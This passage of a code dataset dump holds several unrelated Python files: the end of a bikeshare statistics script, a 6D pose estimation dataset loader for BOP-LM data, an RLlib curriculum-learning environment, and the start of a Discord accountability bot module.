KeyError:\n earliest_birth_year = 'none (due to no data)'\n recent_birth_year = 'none (due to no data)'\n common_birth_year = 'none (due to no data)'\n\n print('\\nThe user type is',user_type)\n print('\\nThe gender_count is',gender_count)\n print('\\nThe earliest birth year is',earliest_birth_year)\n print('\\nThe recent birth year is',recent_birth_year)\n print('\\nThe common birth year is',common_birth_year)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n #define main function\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n\n print('Hello! Let\\'s explore some US bikeshare raw data!')\n #To get inputs (yes/no) from the user to view 5 lines of raw data per every confirmation.\n #Initial value of 0 for printing raw data - per requirement\n\n a = 0;\n #User to enter a number for viewing raw data\n try:\n b = int(input('if you are given an option, how many lines of raw data do you prefer to view per request? Enter a number\\n'))\n except ValueError:\n b=5\n #to improve speed of the process - defaulting value to 5 per requirement\n print(\"Invalid input. Default value set to 5\")\n\n while True:\n sample_data = input(\"Do you want to view sample raw data for analysis? Enter yes or no.\\n\")\n if sample_data.lower() =='yes':\n print(df.iloc[a:b])\n a+=5\n b+=5\n else:\n break\n\n #Option to restart the program\n restart = input('\\nWould you like to restart? 
Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"abhivasanth/bikeshare","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":8356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9891790800","text":"#!/usr/bin/env python3\nimport os\nimport pickle\nimport json\n\nimport cv2\nimport torch\nimport os.path\nimport numpy as np\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom common import Config\nimport pickle as pkl\nfrom utils.basic_utils import Basic_Utils\nimport scipy.io as scio\nimport scipy.misc\ntry:\n from neupeak.utils.webcv2 import imshow, waitKey\nexcept:\n from cv2 import imshow, waitKey\nimport normalSpeed\nfrom models.RandLA.helper_tool import DataProcessing as DP\n\n\nconfig = Config(ds_name='boplm')\nbs_utils = Basic_Utils(config)\n\n\nclass Dataset():\n\n def __init__(self, dataset_name, DEBUG=False):\n self.dataset_name = dataset_name\n self.root = config.boplm_root\n self.debug = DEBUG\n self.xmap = np.array([[j for i in range(640)] for j in range(480)])\n self.ymap = np.array([[i for i in range(640)] for j in range(480)])\n self.diameters = {}\n self.trancolor = transforms.ColorJitter(0.2, 0.2, 0.2, 0.05)\n self.norm = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.224])\n self.cls_lst = bs_utils.read_lines(config.boplm_cls_lst_p)\n self.obj_dict = {}\n self.normals = []\n\n for cls_id, cls in enumerate(self.cls_lst, start=1):\n self.obj_dict[cls] = cls_id\n cls_normal_p = os.path.join(self.root, 'symmetries/{}/symmetries.txt'.format(cls_id))\n normal = self.read_normal(cls_normal_p)\n self.normals.append(normal)\n self.rng = np.random\n\n cache_dir = os.path.join(config.boplm_root, 'cache')\n if not os.path.exists(cache_dir):\n os.makedirs(cache_dir)\n self.cache_dir = cache_dir\n\n if dataset_name == 'train':\n self.add_noise = True\n self.all_lst = self.load_train_image_set()\n self.minibatch_per_epoch = len(self.all_lst) // config.mini_batch_size\n elif dataset_name == 'test' or dataset_name == 'trainval':\n self.add_noise = False\n self.all_lst = self.load_test_image_set()\n else:\n raise NotImplementedError\n print(\"{}_dataset_size: \".format(dataset_name), len(self.all_lst))\n self.sym_cls_ids = [3, 10, 11]\n\n def load_train_image_set(self):\n cache_file = os.path.join(self.cache_dir, 'train_data_collection.pkl')\n if os.path.exists(cache_file):\n with open(cache_file, 'rb') as fid:\n image_index = pickle.load(fid)\n print('train_pbr image index loaded from {}'.format(cache_file))\n print('{} training images'.format(len(image_index)))\n return image_index\n\n annot = []\n for seq_id in range(50):\n tr_obj_dir = os.path.join(self.root, 'train_pbr/{:06d}'.format(seq_id))\n f_pose = os.path.join(tr_obj_dir, 'scene_gt.json')\n f_det = os.path.join(tr_obj_dir, 'scene_gt_info.json')\n f_cam = os.path.join(tr_obj_dir, 'scene_camera.json')\n with open(f_pose, 'r') as f:\n annot_pose = json.load(f)\n with open(f_det, 'r') as f:\n annot_det = json.load(f)\n with open(f_cam, 'r') as f:\n annot_cam = json.load(f)\n for k in annot_pose.keys():\n annot_temp = {}\n annot_temp['rgb_pth'] = os.path.join('train_pbr/{:06d}'.format(seq_id), 'rgb/{:06d}.jpg'.format(int(k)))\n annot_temp['dpt_pth'] = os.path.join('train_pbr/{:06d}'.format(seq_id), 'depth/{:06d}.png'.format(int(k)))\n annot_temp['factor_depth'] = np.array(annot_cam[k]['depth_scale'], dtype=np.float32)\n 
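The BOP-LM dataset record beginning above caches its parsed annotation list with pickle: load the cache file if it exists, otherwise build the list and dump it for next time. That load-or-build pattern reduced to its core; `cached` and `build_annotations` are hypothetical names used only for illustration:

```python
# Load-or-build cache, as in load_train_image_set/load_test_image_set:
# return the pickled result if present, else compute, persist, and return.
import os
import pickle

def cached(cache_path, build):
    if os.path.exists(cache_path):
        with open(cache_path, "rb") as f:
            return pickle.load(f)
    data = build()
    with open(cache_path, "wb") as f:
        pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)
    return data

# annot = cached("cache/train_data_collection.pkl", build_annotations)
```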
annot_temp['intrinsic_matrix'] = np.array(annot_cam[k]['cam_K'], dtype=np.float32).reshape(3, 3)\n\n cls_indexes = []\n poses = []\n msk_orders = []\n for j in range(len(annot_pose[k])):\n obj_id = annot_pose[k][j]['obj_id']\n visib_fract = annot_det[k][j]['visib_fract']\n if (obj_id not in self.obj_dict.values()) or (visib_fract < 0.1):\n continue\n R = np.array(annot_pose[k][j]['cam_R_m2c'], dtype=np.float32).reshape(3, 3)\n T = np.array(annot_pose[k][j]['cam_t_m2c'], dtype=np.float32) / 1000.\n RT = np.concatenate([R, T[:, None]], axis=1)\n poses.append(RT)\n\n cls_indexes.append(obj_id)\n msk_orders.append(j)\n\n annot_temp['msk_orders'] = msk_orders\n annot_temp['cls_indexes'] = cls_indexes\n annot_temp['poses'] = np.array(poses)\n annot_temp['seq_id'] = int(seq_id)\n annot_temp['img_id'] = int(k)\n annot.append(annot_temp)\n\n with open(cache_file, 'wb') as fid:\n pickle.dump(annot, fid, pickle.HIGHEST_PROTOCOL)\n print('wrote train_pbr image index to {}'.format(cache_file))\n return annot\n\n def load_test_image_set(self):\n cache_file = os.path.join(self.cache_dir, 'test_data_collection.pkl')\n if os.path.exists(cache_file):\n with open(cache_file, 'rb') as fid:\n image_index = pickle.load(fid)\n print('testocc image index loaded from {}'.format(cache_file))\n print('{} test images'.format(len(image_index)))\n return image_index\n\n annot = []\n for seq_id in [2]:\n tr_obj_dir = os.path.join(self.root, 'test/{:06d}'.format(seq_id))\n f_pose = os.path.join(tr_obj_dir, 'scene_gt.json')\n f_det = os.path.join(tr_obj_dir, 'scene_gt_info.json')\n f_cam = os.path.join(tr_obj_dir, 'scene_camera.json')\n with open(f_pose, 'r') as f:\n annot_pose = json.load(f)\n with open(f_det, 'r') as f:\n annot_det = json.load(f)\n with open(f_cam, 'r') as f:\n annot_cam = json.load(f)\n for k in annot_pose.keys():\n annot_temp = {}\n annot_temp['rgb_pth'] = os.path.join('test/{:06d}'.format(seq_id), 'rgb/{:06d}.png'.format(int(k)))\n annot_temp['dpt_pth'] = os.path.join('test/{:06d}'.format(seq_id), 'depth/{:06d}.png'.format(int(k)))\n annot_temp['factor_depth'] = np.array(annot_cam[k]['depth_scale'], dtype=np.float32)\n annot_temp['intrinsic_matrix'] = np.array(annot_cam[k]['cam_K'], dtype=np.float32).reshape(3, 3)\n\n cls_indexes = []\n poses = []\n msk_orders = []\n for j in range(len(annot_pose[k])):\n R = np.array(annot_pose[k][j]['cam_R_m2c'], dtype=np.float32).reshape(3, 3)\n T = np.array(annot_pose[k][j]['cam_t_m2c'], dtype=np.float32) / 1000.\n RT = np.concatenate([R, T[:, None]], axis=1)\n poses.append(RT)\n\n obj_id = annot_pose[k][j]['obj_id']\n cls_indexes.append(obj_id)\n msk_orders.append(j)\n\n annot_temp['msk_orders'] = msk_orders\n annot_temp['cls_indexes'] = cls_indexes\n annot_temp['poses'] = np.array(poses)\n annot_temp['seq_id'] = int(seq_id)\n annot_temp['img_id'] = int(k)\n\n annot.append(annot_temp)\n\n with open(cache_file, 'wb') as fid:\n pickle.dump(annot, fid, pickle.HIGHEST_PROTOCOL)\n print('wrote test image index to {}'.format(cache_file))\n return annot\n\n def read_normal(self, filename):\n with open(filename) as f:\n lines = f.readlines()\n normal = np.array(lines[3].strip().split(), dtype=np.float32)\n return normal\n\n def syn_gen(self):\n n = len(self.all_lst)\n idx = self.rng.randint(0, n)\n item = self.all_lst[idx]\n return item\n\n def real_gen(self):\n n = len(self.real_lst)\n idx = self.rng.randint(0, n)\n item = self.real_lst[idx]\n return item\n\n def rand_range(self, rng, lo, hi):\n return rng.rand()*(hi-lo)+lo\n\n def gaussian_noise(self, rng, img, 
sigma):\n \"\"\"add gaussian noise of given sigma to image\"\"\"\n img = img + rng.randn(*img.shape) * sigma\n img = np.clip(img, 0, 255).astype('uint8')\n return img\n\n def linear_motion_blur(self, img, angle, length):\n \"\"\":param angle: in degree\"\"\"\n rad = np.deg2rad(angle)\n dx = np.cos(rad)\n dy = np.sin(rad)\n a = int(max(list(map(abs, (dx, dy)))) * length * 2)\n if a <= 0:\n return img\n kern = np.zeros((a, a))\n cx, cy = a // 2, a // 2\n dx, dy = list(map(int, (dx * length + cx, dy * length + cy)))\n cv2.line(kern, (cx, cy), (dx, dy), 1.0)\n s = kern.sum()\n if s == 0:\n kern[cx, cy] = 1.0\n else:\n kern /= s\n return cv2.filter2D(img, -1, kern)\n\n def rgb_add_noise(self, img):\n rng = self.rng\n # apply HSV augmentor\n if rng.rand() > 0:\n hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV).astype(np.uint16)\n hsv_img[:, :, 1] = hsv_img[:, :, 1] * self.rand_range(rng, 1.25, 1.45)\n hsv_img[:, :, 2] = hsv_img[:, :, 2] * self.rand_range(rng, 1.15, 1.35)\n hsv_img[:, :, 1] = np.clip(hsv_img[:, :, 1], 0, 255)\n hsv_img[:, :, 2] = np.clip(hsv_img[:, :, 2], 0, 255)\n img = cv2.cvtColor(hsv_img.astype(np.uint8), cv2.COLOR_HSV2BGR)\n\n if rng.rand() > .8: # sharpen\n kernel = -np.ones((3, 3))\n kernel[1, 1] = rng.rand() * 3 + 9\n kernel /= kernel.sum()\n img = cv2.filter2D(img, -1, kernel)\n\n if rng.rand() > 0.8: # motion blur\n r_angle = int(rng.rand() * 360)\n r_len = int(rng.rand() * 15) + 1\n img = self.linear_motion_blur(img, r_angle, r_len)\n\n if rng.rand() > 0.8:\n if rng.rand() > 0.2:\n img = cv2.GaussianBlur(img, (3, 3), rng.rand())\n else:\n img = cv2.GaussianBlur(img, (5, 5), rng.rand())\n\n if rng.rand() > 0.2:\n img = self.gaussian_noise(rng, img, rng.randint(15))\n else:\n img = self.gaussian_noise(rng, img, rng.randint(25))\n\n if rng.rand() > 0.8:\n img = img + np.random.normal(loc=0.0, scale=7.0, size=img.shape)\n\n return np.clip(img, 0, 255).astype(np.uint8)\n\n def dpt_2_pcld(self, dpt, cam_scale, K):\n if len(dpt.shape) > 2:\n dpt = dpt[:, :, 0]\n dpt = dpt.astype(np.float32) / cam_scale\n msk = (dpt > 1e-8).astype(np.float32)\n row = (self.ymap - K[0][2]) * dpt / K[0][0]\n col = (self.xmap - K[1][2]) * dpt / K[1][1]\n dpt_3d = np.concatenate(\n (row[..., None], col[..., None], dpt[..., None]), axis=2\n )\n dpt_3d = dpt_3d * msk[:, :, None]\n return dpt_3d\n\n def generate_labels(self, item):\n mask = np.zeros((480, 640), dtype=np.uint8)\n cls_indexes = item['cls_indexes']\n msk_orders = item['msk_orders']\n for i in range(len(cls_indexes)):\n obj_id = cls_indexes[i]\n if self.dataset_name == 'train':\n msk_vis_pth = os.path.join(\n self.root, 'train_pbr/{:06d}/mask_visib/{:06d}_{:06d}.png'.format(item['seq_id'], item['img_id'], msk_orders[i]))\n else:\n msk_vis_pth = os.path.join(\n self.root, 'test/{:06d}/mask_visib/{:06d}_{:06d}.png'.format(item['seq_id'], item['img_id'], msk_orders[i]))\n with Image.open(msk_vis_pth) as li:\n labels = np.array(li)\n mask[labels!=0] = obj_id\n\n return mask\n\n def generate_sym_cor(self, item):\n if self.dataset_name == 'train':\n sym_cor = np.load(\n os.path.join(self.root, 'train_pbr/{:06d}/sym_cor/{:06d}.npz'.format(item['seq_id'], item['img_id']))\n )['cor']\n else:\n sym_cor = np.load(\n os.path.join(self.root, 'test/{:06d}/sym_cor/{:06d}.npz'.format(item['seq_id'], item['img_id']))\n )['cor']\n return sym_cor\n\n def get_item(self, item):\n with Image.open(os.path.join(self.root, item['rgb_pth'])) as ri:\n if self.add_noise:\n ri = self.trancolor(ri)\n rgb = np.array(ri)[:, :, :3]\n with 
Image.open(os.path.join(self.root, item['dpt_pth'])) as di:\n dpt_um = np.array(di)\n\n labels = self.generate_labels(item)\n rgb_labels = labels.copy()\n\n K = item['intrinsic_matrix']\n sym_cor = self.generate_sym_cor(item)\n cam_scale = item['factor_depth']\n\n if self.add_noise:\n rgb = self.rgb_add_noise(rgb)\n\n msk_dp = dpt_um > 1e-6\n dpt_mm = (dpt_um.copy() * cam_scale).astype(np.uint16)\n nrm_map = normalSpeed.depth_normal(\n dpt_mm, K[0][0], K[1][1], 5, 2000, 20, False\n )\n if self.debug:\n show_nrm_map = ((nrm_map + 1.0) * 127).astype(np.uint8)\n imshow(\"nrm_map\", show_nrm_map)\n imshow('mask', rgb_labels)\n print('sym_cor:', sym_cor.shape)\n\n dpt_m = dpt_mm.astype(np.float32) / 1000\n dpt_xyz = self.dpt_2_pcld(dpt_m, 1, K)\n\n choose = msk_dp.flatten().nonzero()[0].astype(np.uint32)\n if len(choose) < 400:\n return None\n choose_2 = np.array([i for i in range(len(choose))])\n if len(choose_2) < 400:\n return None\n if len(choose_2) > config.n_sample_points:\n c_mask = np.zeros(len(choose_2), dtype=int)\n c_mask[:config.n_sample_points] = 1\n np.random.shuffle(c_mask)\n choose_2 = choose_2[c_mask.nonzero()]\n else:\n choose_2 = np.pad(choose_2, (0, config.n_sample_points-len(choose_2)), 'wrap')\n choose = np.array(choose)[choose_2]\n\n sf_idx = np.arange(choose.shape[0])\n np.random.shuffle(sf_idx)\n choose = choose[sf_idx]\n\n cld = dpt_xyz.reshape(-1, 3)[choose, :]\n rgb_pt = rgb.reshape(-1, 3)[choose, :].astype(np.float32)\n nrm_pt = nrm_map[:, :, :3].reshape(-1, 3)[choose, :]\n labels_pt = labels.flatten()[choose]\n choose = np.array([choose])\n cld_rgb_nrm = np.concatenate((cld, rgb_pt, nrm_pt), axis=1).transpose(1, 0)\n sym_cor_targ = sym_cor.reshape(-1, 3)[choose, :].astype(np.float32)\n\n cls_id_lst = np.array(item['cls_indexes']).astype(np.uint32)\n RTs, kp3ds, ctr3ds, cls_ids, kp_targ_ofst, ctr_targ_ofst, graph_targ = self.get_pose_gt_info(\n cld, labels_pt, cls_id_lst, item\n )\n\n h, w = rgb_labels.shape\n dpt_6c = np.concatenate((dpt_xyz, nrm_map[:, :, :3]), axis=2).transpose(2, 0, 1)\n rgb = np.transpose(rgb, (2, 0, 1)) # hwc2chw\n\n xyz_lst = [dpt_xyz.transpose(2, 0, 1)] # c, h, w\n msk_lst = [dpt_xyz[2, :, :] > 1e-8]\n\n for i in range(3):\n scale = pow(2, i+1)\n nh, nw = h // pow(2, i+1), w // pow(2, i+1)\n ys, xs = np.mgrid[:nh, :nw]\n xyz_lst.append(xyz_lst[0][:, ys*scale, xs*scale])\n msk_lst.append(xyz_lst[-1][2, :, :] > 1e-8)\n sr2dptxyz = {\n pow(2, ii): item.reshape(3, -1).transpose(1, 0) for ii, item in enumerate(xyz_lst)\n }\n sr2msk = {\n pow(2, ii): item.reshape(-1) for ii, item in enumerate(msk_lst)\n }\n\n rgb_ds_sr = [4, 8, 8, 8]\n n_ds_layers = 4\n pcld_sub_s_r = [4, 4, 4, 4]\n inputs = {}\n # DownSample stage\n for i in range(n_ds_layers):\n nei_idx = DP.knn_search(\n cld[None, ...], cld[None, ...], 16\n ).astype(np.int32).squeeze(0)\n sub_pts = cld[:cld.shape[0] // pcld_sub_s_r[i], :]\n pool_i = nei_idx[:cld.shape[0] // pcld_sub_s_r[i], :]\n up_i = DP.knn_search(\n sub_pts[None, ...], cld[None, ...], 1\n ).astype(np.int32).squeeze(0)\n inputs['cld_xyz%d'%i] = cld.astype(np.float32).copy()\n inputs['cld_nei_idx%d'%i] = nei_idx.astype(np.int32).copy()\n inputs['cld_sub_idx%d'%i] = pool_i.astype(np.int32).copy()\n inputs['cld_interp_idx%d'%i] = up_i.astype(np.int32).copy()\n nei_r2p = DP.knn_search(\n sr2dptxyz[rgb_ds_sr[i]][None, ...], sub_pts[None, ...], 16\n ).astype(np.int32).squeeze(0)\n inputs['r2p_ds_nei_idx%d'%i] = nei_r2p.copy()\n nei_p2r = DP.knn_search(\n sub_pts[None, ...], sr2dptxyz[rgb_ds_sr[i]][None, ...], 1\n 
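# A compact equivalent of the choose/choose_2 logic above, which enforces a
# fixed point budget: randomly keep n_sample_points indices when there are too
# many valid depth pixels, wrap-pad when there are too few.
import numpy as np

def fixed_budget(idx, n_sample_points, rng=np.random):
    if len(idx) > n_sample_points:
        keep = np.zeros(len(idx), dtype=bool)
        keep[:n_sample_points] = True
        rng.shuffle(keep)              # random subset via a shuffled mask
        return idx[keep]
    return np.pad(idx, (0, n_sample_points - len(idx)), 'wrap')

assert len(fixed_budget(np.arange(10), 4)) == 4
assert len(fixed_budget(np.arange(3), 8)) == 8  # indices repeat via 'wrap'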
).astype(np.int32).squeeze(0)\n inputs['p2r_ds_nei_idx%d'%i] = nei_p2r.copy()\n cld = sub_pts\n\n n_up_layers = 3\n rgb_up_sr = [4, 2, 2]\n for i in range(n_up_layers):\n r2p_nei = DP.knn_search(\n sr2dptxyz[rgb_up_sr[i]][None, ...],\n inputs['cld_xyz%d'%(n_ds_layers-i-1)][None, ...], 16\n ).astype(np.int32).squeeze(0)\n inputs['r2p_up_nei_idx%d'%i] = r2p_nei.copy()\n p2r_nei = DP.knn_search(\n inputs['cld_xyz%d'%(n_ds_layers-i-1)][None, ...],\n sr2dptxyz[rgb_up_sr[i]][None, ...], 1\n ).astype(np.int32).squeeze(0)\n inputs['p2r_up_nei_idx%d'%i] = p2r_nei.copy()\n\n show_rgb = rgb.transpose(1, 2, 0).copy()[:, :, ::-1]\n if self.debug:\n for ip, xyz in enumerate(xyz_lst):\n pcld = xyz.reshape(3, -1).transpose(1, 0)\n p2ds = bs_utils.project_p3d(pcld, cam_scale, K)\n print(show_rgb.shape, pcld.shape)\n srgb = bs_utils.paste_p2ds(show_rgb.copy(), p2ds, (0, 0, 255))\n imshow(\"rz_pcld_%d\" % ip, srgb)\n p2ds = bs_utils.project_p3d(inputs['cld_xyz%d'%ip], cam_scale, K)\n srgb1 = bs_utils.paste_p2ds(show_rgb.copy(), p2ds, (0, 0, 255))\n imshow(\"rz_pcld_%d_rnd\" % ip, srgb1)\n\n item_dict = dict(\n rgb=rgb.astype(np.uint8), # [c, h, w]\n cld_rgb_nrm=cld_rgb_nrm.astype(np.float32), # [9, npts]\n choose=choose.astype(np.int32), # [1, npts]\n labels=labels_pt.astype(np.int32), # [npts]\n rgb_labels=rgb_labels.astype(np.int32), # [h, w]\n dpt_map_m=dpt_m.astype(np.float32), # [h, w]\n RTs=RTs.astype(np.float32),\n kp_targ_ofst=kp_targ_ofst.astype(np.float32),\n graph_targ=graph_targ.astype(np.float32),\n sym_cor_targ=sym_cor_targ.astype(np.float32),\n ctr_targ_ofst=ctr_targ_ofst.astype(np.float32),\n cls_ids=cls_ids.astype(np.int32),\n ctr_3ds=ctr3ds.astype(np.float32),\n kp_3ds=kp3ds.astype(np.float32),\n seq_id=np.array(item['seq_id']).astype(np.int32),\n img_id=np.array(item['img_id']).astype(np.int32)\n )\n item_dict.update(inputs)\n if self.debug:\n extra_d = dict(\n dpt_xyz_nrm=dpt_6c.astype(np.float32), # [6, h, w]\n cam_scale=np.array([cam_scale]).astype(np.float32),\n K=K.astype(np.float32),\n )\n item_dict.update(extra_d)\n item_dict['normal_map'] = nrm_map[:, :, :3].astype(np.float32)\n return item_dict\n\n def get_pose_gt_info(self, cld, labels, cls_id_lst, meta):\n RTs = np.zeros((config.n_objects, 3, 4))\n kp3ds = np.zeros((config.n_objects, config.n_keypoints, 3))\n ctr3ds = np.zeros((config.n_objects, 3))\n cls_ids = np.zeros((config.n_objects, 1))\n kp_targ_ofst = np.zeros((config.n_sample_points, config.n_keypoints, 3))\n ctr_targ_ofst = np.zeros((config.n_sample_points, 3))\n edg_targ_ofst = np.zeros((config.n_sample_points, config.n_edges, 3))\n for i, cls_id in enumerate(cls_id_lst):\n r = meta['poses'][i, :, :][:, 0:3]\n t = np.array(meta['poses'][i, :, :][:, 3:4].flatten()[:, None])\n RT = np.concatenate((r, t), axis=1)\n RTs[i] = RT\n\n ctr = bs_utils.get_ctr(self.cls_lst[cls_id-1], ds_type='boplm').copy()[:, None]\n ctr = np.dot(ctr.T, r.T) + t[:, 0]\n ctr3ds[i, :] = ctr[0]\n msk_idx = np.where(labels == cls_id)[0]\n\n target_offset = np.array(np.add(cld, -1.0*ctr3ds[i, :]))\n ctr_targ_ofst[msk_idx,:] = target_offset[msk_idx, :]\n cls_ids[i, :] = np.array([cls_id])\n\n key_kpts = ''\n if config.n_keypoints == 8:\n kp_type = 'farthest'\n else:\n kp_type = 'farthest{}'.format(config.n_keypoints)\n kps = bs_utils.get_kps(\n self.cls_lst[cls_id-1], kp_type=kp_type, ds_type='boplm'\n ).copy()\n kps = np.dot(kps, r.T) + t[:, 0]\n kp3ds[i] = kps\n\n target = []\n for kp in kps:\n target.append(np.add(cld, -1.0*kp))\n target_offset = np.array(target).transpose(1, 0, 2) # [npts, nkps, 
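# A toy version of the per-point offset targets built in get_pose_gt_info
# above: each foreground point regresses its displacement to every posed
# keypoint (written as cld - kp, matching the record), while background
# points carry a zero target. Names are illustrative.
import numpy as np

def offset_targets(cld, kps, labels, cls_id):
    # cld: (N,3) scene points, kps: (K,3) posed keypoints, labels: (N,)
    ofst = cld[:, None, :] - kps[None, :, :]   # (N, K, 3)
    ofst[labels != cls_id] = 0.0               # mask out background points
    return ofst

cld = np.zeros((4, 3)); cld[2] = [1.0, 0.0, 0.0]
t = offset_targets(cld, np.zeros((2, 3)), np.array([0, 0, 5, 0]), 5)
assert np.allclose(t[2, 0], [1.0, 0.0, 0.0]) and not t[[0, 1, 3]].any()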
c]\n kp_targ_ofst[msk_idx, :, :] = target_offset[msk_idx, :, :]\n\n edge_idx = 0\n for start_idx in range(0, config.n_keypoints - 1):\n start = kps[start_idx]\n for end_idx in range(start_idx + 1, config.n_keypoints):\n end = kps[end_idx]\n edge = end - start\n edg_targ_ofst[msk_idx, edge_idx, :] = edge\n edge_idx += 1\n return RTs, kp3ds, ctr3ds, cls_ids, kp_targ_ofst, ctr_targ_ofst, edg_targ_ofst\n\n def __len__(self):\n return len(self.all_lst)\n\n def __getitem__(self, idx):\n if self.dataset_name == 'train':\n item_name = self.syn_gen()\n data = self.get_item(item_name)\n while data is None:\n item_name = self.syn_gen()\n data = self.get_item(item_name)\n return data\n else:\n item_name = self.all_lst[idx]\n return self.get_item(item_name)\n\n\ndef main():\n # config.mini_batch_size = 1\n global DEBUG\n DEBUG = True\n ds = {}\n ds['train'] = Dataset('train', DEBUG=True)\n # ds['val'] = Dataset('validation')\n ds['test'] = Dataset('test', DEBUG=True)\n idx = dict(\n train=0,\n val=0,\n test=0\n )\n while True:\n # for cat in ['val', 'test']:\n for cat in ['train']:\n # for cat in ['test']:\n datum = ds[cat].__getitem__(idx[cat])\n idx[cat] += 1\n K = datum['K']\n cam_scale = datum['cam_scale']\n rgb = datum['rgb'].transpose(1, 2, 0)[...,::-1].copy()# [...,::-1].copy()\n for i in range(9):\n pcld = datum['cld_rgb_nrm'][:3, :].transpose(1, 0).copy()\n p2ds = bs_utils.project_p3d(pcld, 1.0, K)\n # rgb = bs_utils.draw_p2ds(rgb, p2ds)\n kp3d = datum['kp_3ds'][i]\n if kp3d.sum() < 1e-6:\n break\n kp_2ds = bs_utils.project_p3d(kp3d, 1.0, K)\n rgb = bs_utils.draw_p2ds(\n rgb, kp_2ds, 3, bs_utils.get_label_color(datum['cls_ids'][i][0], mode=1)\n )\n ctr3d = datum['ctr_3ds'][i]\n ctr_2ds = bs_utils.project_p3d(ctr3d[None, :], 1.0, K)\n rgb = bs_utils.draw_p2ds(\n rgb, ctr_2ds, 4, (0, 0, 255)\n )\n imshow('{}_rgb'.format(cat), rgb)\n cmd = waitKey(0)\n if cmd == ord('q'):\n exit()\n else:\n continue\n\n\nif __name__ == \"__main__\":\n main()\n# vim: ts=4 sw=4 sts=4 expandtab\n","repo_name":"JiChun-Wang/MGRNet","sub_path":"datasets/lmo/boplm_dataset.py","file_name":"boplm_dataset.py","file_ext":"py","file_size_in_byte":23825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"36820614086","text":"\"\"\"Implementation of a simple simulation/environment in AML.\"\"\"\nimport numpy as np\n\n# from gymnasium import Env\nfrom gymnasium.spaces import Box, Dict\n\n# Import TaskSettableEnv from RLlib\nfrom ray.rllib.env.apis.task_settable_env import TaskSettableEnv\nfrom ray.rllib.utils.annotations import override\n\n\nclass SimpleAdder(TaskSettableEnv):\n \"\"\"\n Implement a SimpleAdder as a custom Gymnasium environment.\n\n Details on which attributes and methods are required for the integration\n can be found in the docs.\n\n The environment has a pretty simple state and action space. The state is\n composed of an integer numbers. The action is composed of an integer number\n between -10 and 10. At each episode, the state number is initialized between\n 0 and 100, and at each iteration the agent chooses a number between -10 and 10.\n The chosen number is added to the state. The purpose of the simulation is to\n get the state equal to 50, at which point the episode terminates. 
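# The environment defined in this record widens its reset range as the task
# "exponent" grows (start value = 50 +/- 2**exponent). Outside RLlib's
# TaskSettableEnv machinery, a curriculum driver can be as simple as raising
# the exponent once recent episodes succeed often enough; the thresholds
# below are illustrative assumptions, not from the source.
def next_exponent(exponent, recent_successes, window=20, threshold=0.9, max_exponent=6):
    if len(recent_successes) >= window:
        rate = sum(recent_successes[-window:]) / window
        if rate >= threshold and exponent < max_exponent:
            return exponent + 1
    return exponent

assert next_exponent(1, [True] * 20) == 2
assert next_exponent(1, [False] * 20) == 1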
The episode\n duration is limited to 10 iterations.\n \"\"\"\n\n def __init__(self, env_config):\n self.observation_space = Dict(\n {\"value\": Box(low=-float(\"inf\"), high=float(\"inf\"))}\n )\n self.action_space = Dict({\"addend\": Box(low=-10, high=10, dtype=np.int32)})\n\n # Initialize the task exponent attribute to 1\n self.exponent = 1\n\n def _get_obs(self):\n \"\"\"Get the observable state.\"\"\"\n return {\"value\": np.array([self.state[\"value\"]])}\n\n def _get_info(self):\n \"\"\"Get additional info not needed by the agent's decision.\"\"\"\n return {}\n\n def reward(self, state):\n \"\"\"\n Return the reward value.\n\n For this simple example this is just the distance to the number 50.\n We add 10 (maximum steps per episode) to the reward and subtract the\n current step to encourage to finish the episode as fast as possible.\n \"\"\"\n return -abs(state[\"value\"] - 50) + 10 - self.iter\n\n def reset(self, *, seed=None, options=None):\n \"\"\"Start a new episode.\"\"\"\n self.iter = 0\n # Get the current task (curriculum level)\n task = self.get_task()\n # Get the exponent of 2 for the task\n exponent = task[\"exponent\"]\n # Initialize the state value randomly between +/- 2**exponent from target of 50\n self.state = {\"value\": 50 + np.random.randint(-(2**exponent), 2**exponent)}\n return self._get_obs(), self._get_info()\n\n def step(self, action):\n \"\"\"Advance one iteration by applying the given ``action``.\"\"\"\n self.state[\"value\"] += action[\"addend\"].item()\n self.iter += 1\n reward = self.reward(self.state)\n terminated = self.state[\"value\"] == 50\n truncated = self.iter >= 10\n return (\n self._get_obs(),\n reward,\n terminated,\n truncated,\n self._get_info(),\n )\n\n @override(TaskSettableEnv)\n def get_task(self):\n \"\"\"Implement this to get the current task (curriculum level).\"\"\"\n # Return the current exponent value as the task\n return {\"exponent\": self.exponent}\n\n @override(TaskSettableEnv)\n def set_task(self, task):\n \"\"\"Set a new task for this sim env.\"\"\"\n # Set the exponent value based on the task\n self.exponent = task[\"exponent\"]\n","repo_name":"Azure/plato","sub_path":"examples/curriculum-learning/src/sim_curriculum_capable.py","file_name":"sim_curriculum_capable.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"66"} +{"seq_id":"36217865712","text":"import re\nimport datetime\nimport discord\nimport asyncio\nimport contextlib\nfrom cmdClient.checks import in_guild\n\nfrom meta import client\nfrom utils.lib import multiselect_regex, parse_ranges, prop_tabulate\nfrom data import NOTNULL\nfrom data.conditions import GEQ, LEQ\n\nfrom .module import module\nfrom .lib import utc_now\nfrom .tracker import AccountabilityGuild as AGuild\nfrom .tracker import room_lock\nfrom .TimeSlot import SlotMember\nfrom .data import accountability_members, accountability_member_info, accountability_rooms\n\n\nhint_icon = \"https://projects.iamcal.com/emoji-data/img-apple-64/1f4a1.png\"\n\n\ndef time_format(time):\n diff = (time - utc_now()).total_seconds()\n if diff < 0:\n diffstr = \"`Right Now!!`\"\n elif diff < 600:\n diffstr = \"`Very soon!!`\"\n elif diff < 3600:\n diffstr = \"`In <1 hour `\"\n else:\n hours = 